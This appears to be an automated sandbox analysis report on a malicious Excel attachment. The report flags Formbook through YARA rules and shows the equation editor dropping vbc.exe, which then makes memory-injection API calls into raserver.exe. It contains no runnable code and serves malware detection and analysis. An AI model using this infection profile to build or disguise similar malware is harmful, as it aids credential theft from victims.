Source: Yara match	File source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1]			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419D50 NtCreateFile,	5_2_00419D50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E00 NtReadFile,	5_2_00419E00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E80 NtClose,	5_2_00419E80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F30 NtAllocateVirtualMemory,	5_2_00419F30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419D4A NtCreateFile,	5_2_00419D4A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419DFA NtReadFile,	5_2_00419DFA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E4B NtReadFile,	5_2_00419E4B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E7A NtClose,	5_2_00419E7A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F2B NtAllocateVirtualMemory,	5_2_00419F2B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E000C4 NtCreateFile,LdrInitializeThunk,	5_2_00E000C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E00078 NtResumeThread,LdrInitializeThunk,	5_2_00E00078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E00048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00E00048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFF9F0 NtClose,LdrInitializeThunk,	5_2_00DFF9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFF900 NtReadFile,LdrInitializeThunk,	5_2_00DFF900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_00DFFAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_00DFFAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_00DFFBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_00DFFB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_00DFFC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_00DFFC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_00DFFDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFD8C NtDelayExecution,LdrInitializeThunk,	5_2_00DFFD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_00DFFED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_00DFFEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFFB4 NtCreateSection,LdrInitializeThunk,	5_2_00DFFFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E010D0 NtOpenProcessToken,	5_2_00E010D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E00060 NtQuerySection,	5_2_00E00060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E001D4 NtSetValueKey,	5_2_00E001D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E01148 NtOpenThread,	5_2_00E01148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0010C NtOpenDirectoryObject,	5_2_00E0010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E007AC NtCreateMutant,	5_2_00E007AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFF8CC NtWaitForSingleObject,	5_2_00DFF8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E01930 NtSetContextThread,	5_2_00E01930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFF938 NtWriteFile,	5_2_00DFF938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFAB8 NtQueryValueKey,	5_2_00DFFAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFA50 NtEnumerateValueKey,	5_2_00DFFA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFA20 NtQueryInformationFile,	5_2_00DFFA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFBE8 NtQueryVirtualMemory,	5_2_00DFFBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFB50 NtCreateKey,	5_2_00DFFB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFC48 NtSetInformationFile,	5_2_00DFFC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E00C40 NtGetContextThread,	5_2_00E00C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFC30 NtOpenProcess,	5_2_00DFFC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E01D80 NtSuspendThread,	5_2_00E01D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFD5C NtEnumerateKey,	5_2_00DFFD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFE24 NtWriteVirtualMemory,	5_2_00DFFE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFFFC NtCreateProcessEx,	5_2_00DFFFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DFFF34 NtQueueApcThread,	5_2_00DFFF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021500C4 NtCreateFile,LdrInitializeThunk,	7_2_021500C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021507AC NtCreateMutant,LdrInitializeThunk,	7_2_021507AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_0214FAB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_0214FAD0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_0214FAE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FB50 NtCreateKey,LdrInitializeThunk,	7_2_0214FB50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_0214FB68
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_0214FBB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214F900 NtReadFile,LdrInitializeThunk,	7_2_0214F900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214F9F0 NtClose,LdrInitializeThunk,	7_2_0214F9F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_0214FED0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FFB4 NtCreateSection,LdrInitializeThunk,	7_2_0214FFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_0214FC60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FD8C NtDelayExecution,LdrInitializeThunk,	7_2_0214FD8C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_0214FDC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02150048 NtProtectVirtualMemory,	7_2_02150048
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02150078 NtResumeThread,	7_2_02150078
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02150060 NtQuerySection,	7_2_02150060
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021510D0 NtOpenProcessToken,	7_2_021510D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215010C NtOpenDirectoryObject,	7_2_0215010C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02151148 NtOpenThread,	7_2_02151148
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021501D4 NtSetValueKey,	7_2_021501D4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FA20 NtQueryInformationFile,	7_2_0214FA20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FA50 NtEnumerateValueKey,	7_2_0214FA50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FBE8 NtQueryVirtualMemory,	7_2_0214FBE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214F8CC NtWaitForSingleObject,	7_2_0214F8CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02151930 NtSetContextThread,	7_2_02151930
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214F938 NtWriteFile,	7_2_0214F938
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FE24 NtWriteVirtualMemory,	7_2_0214FE24
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FEA0 NtReadVirtualMemory,	7_2_0214FEA0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FF34 NtQueueApcThread,	7_2_0214FF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FFFC NtCreateProcessEx,	7_2_0214FFFC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FC30 NtOpenProcess,	7_2_0214FC30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02150C40 NtGetContextThread,	7_2_02150C40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FC48 NtSetInformationFile,	7_2_0214FC48
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FC90 NtUnmapViewOfSection,	7_2_0214FC90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0214FD5C NtEnumerateKey,	7_2_0214FD5C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02151D80 NtSuspendThread,	7_2_02151D80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099D50 NtCreateFile,	7_2_00099D50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099E00 NtReadFile,	7_2_00099E00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099E80 NtClose,	7_2_00099E80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099F30 NtAllocateVirtualMemory,	7_2_00099F30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099D4A NtCreateFile,	7_2_00099D4A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099DFA NtReadFile,	7_2_00099DFA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099E4B NtReadFile,	7_2_00099E4B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099E7A NtClose,	7_2_00099E7A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00099F2B NtAllocateVirtualMemory,	7_2_00099F2B

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004542E0	4_2_004542E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00452FB8	4_2_00452FB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454260	4_2_00454260
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00455220	4_2_00455220
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045CC58	4_2_0045CC58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00456F6D	4_2_00456F6D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454FCF	4_2_00454FCF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454FE0	4_2_00454FE0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00641C1E	4_2_00641C1E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004501E4	4_2_004501E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450681	4_2_00450681
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041E038	5_2_0041E038
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D1B2	5_2_0041D1B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004012FC	5_2_004012FC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041E2A2	5_2_0041E2A2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E2C	5_2_00409E2C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E30	5_2_00409E30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041E7AC	5_2_0041E7AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0E0C6	5_2_00E0E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E8D06D	5_2_00E8D06D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E13040	5_2_00E13040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E2905A	5_2_00E2905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E3D005	5_2_00E3D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0E2E9	5_2_00E0E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EB1238	5_2_00EB1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0F3CF	5_2_00E0F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E363DB	5_2_00E363DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EB63BF	5_2_00EB63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E5A37B	5_2_00E5A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E17353	5_2_00E17353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E12305	5_2_00E12305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E45485	5_2_00E45485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E21489	5_2_00E21489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E4D47D	5_2_00E4D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E9443E	5_2_00E9443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E905E3	5_2_00E905E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E2C5F0	5_2_00E2C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E56540	5_2_00E56540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E1351F	5_2_00E1351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E1E6C1	5_2_00E1E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E14680	5_2_00E14680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EB2622	5_2_00EB2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E5A634	5_2_00E5A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E457C3	5_2_00E457C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E1C7BC	5_2_00E1C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E9579A	5_2_00E9579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EAF8EE	5_2_00EAF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E8F8C4	5_2_00E8F8C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E3286D	5_2_00E3286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E1C85C	5_2_00E1C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E269FE	5_2_00E269FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E129B2	5_2_00E129B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EB098E	5_2_00EB098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E9394B	5_2_00E9394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E95955	5_2_00E95955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EC3A83	5_2_00EC3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E9DBDA	5_2_00E9DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0FBD7	5_2_00E0FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EBCBA4	5_2_00EBCBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E37B00	5_2_00E37B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EAFDDD	5_2_00EAFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E1CD5B	5_2_00E1CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E40D3B	5_2_00E40D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E2EE4C	5_2_00E2EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E42E2F	5_2_00E42E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E82FDC	5_2_00E82FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EACFB1	5_2_00EACFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E3DF7C	5_2_00E3DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E20F3F	5_2_00E20F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02201238	7_2_02201238
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215E2E9	7_2_0215E2E9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02162305	7_2_02162305
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02167353	7_2_02167353
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021AA37B	7_2_021AA37B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_022063BF	7_2_022063BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021863DB	7_2_021863DB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215F3CF	7_2_0215F3CF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0218D005	7_2_0218D005
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0217905A	7_2_0217905A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02163040	7_2_02163040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021DD06D	7_2_021DD06D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215E0C6	7_2_0215E0C6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02202622	7_2_02202622
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021AA634	7_2_021AA634
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02164680	7_2_02164680
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0216E6C1	7_2_0216E6C1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E579A	7_2_021E579A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0216C7BC	7_2_0216C7BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021957C3	7_2_021957C3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E443E	7_2_021E443E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0219D47D	7_2_0219D47D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02195485	7_2_02195485
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02171489	7_2_02171489
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0216351F	7_2_0216351F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021A6540	7_2_021A6540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0217C5F0	7_2_0217C5F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E05E3	7_2_021E05E3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02213A83	7_2_02213A83
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02187B00	7_2_02187B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0220CBA4	7_2_0220CBA4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215FBD7	7_2_0215FBD7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021EDBDA	7_2_021EDBDA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E6BCB	7_2_021E6BCB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0216C85C	7_2_0216C85C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0218286D	7_2_0218286D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021DF8C4	7_2_021DF8C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021FF8EE	7_2_021FF8EE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E5955	7_2_021E5955
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021E394B	7_2_021E394B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021629B2	7_2_021629B2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0220098E	7_2_0220098E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021769FE	7_2_021769FE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02192E2F	7_2_02192E2F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0217EE4C	7_2_0217EE4C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02170F3F	7_2_02170F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0218DF7C	7_2_0218DF7C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021FCFB1	7_2_021FCFB1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021D2FDC	7_2_021D2FDC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02190D3B	7_2_02190D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0216CD5B	7_2_0216CD5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021FFDDD	7_2_021FFDDD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009E038	7_2_0009E038
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009D1B2	7_2_0009D1B2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009E2A2	7_2_0009E2A2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009E7AC	7_2_0009E7AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00089E2C	7_2_00089E2C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00089E30	7_2_00089E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: MT OCEAN STAR ISO 8217 2005.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 021A3F92 appears 132 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 021CF970 appears 84 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 0215DF5C appears 123 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 0215E2A8 appears 41 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 021A373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00E7F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00E5373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00E0DF5C appears 121 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00E53F92 appears 132 times
